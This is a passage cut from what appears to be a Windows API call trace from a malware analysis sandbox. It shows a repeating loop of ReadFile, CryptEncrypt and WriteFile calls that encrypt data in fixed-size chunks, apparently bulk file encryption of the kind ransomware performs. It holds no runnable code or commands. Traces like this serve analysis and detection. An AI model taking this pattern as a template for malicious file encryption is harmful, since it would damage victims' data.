dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.899] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.900] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.901] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.901] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.901] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.901] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.901] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.902] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.902] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.902] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.902] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.902] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.902] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.903] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.903] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.903] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.903] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.903] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.903] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.904] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.904] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.904] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.904] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.905] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.905] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.905] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.905] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.905] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.905] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.905] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.905] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.906] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.906] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.906] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.906] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.906] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.906] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.906] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.906] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.907] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.907] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.907] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.907] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.907] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.907] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.907] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.907] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.907] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.907] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.907] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.907] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.907] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.908] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.908] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.908] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.908] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.908] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.908] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.908] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.908] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.908] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.908] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.908] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.908] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.908] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.909] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.909] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.909] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.909] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.909] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.909] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.909] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.909] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.909] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.909] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.909] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.909] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.909] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.910] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.910] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.910] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.910] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.910] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.910] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.910] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.910] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.910] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.910] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.910] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.910] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.910] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.911] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.911] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.911] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.911] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.911] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.911] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.911] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.911] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.911] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.911] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.911] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.911] WriteFile (in: 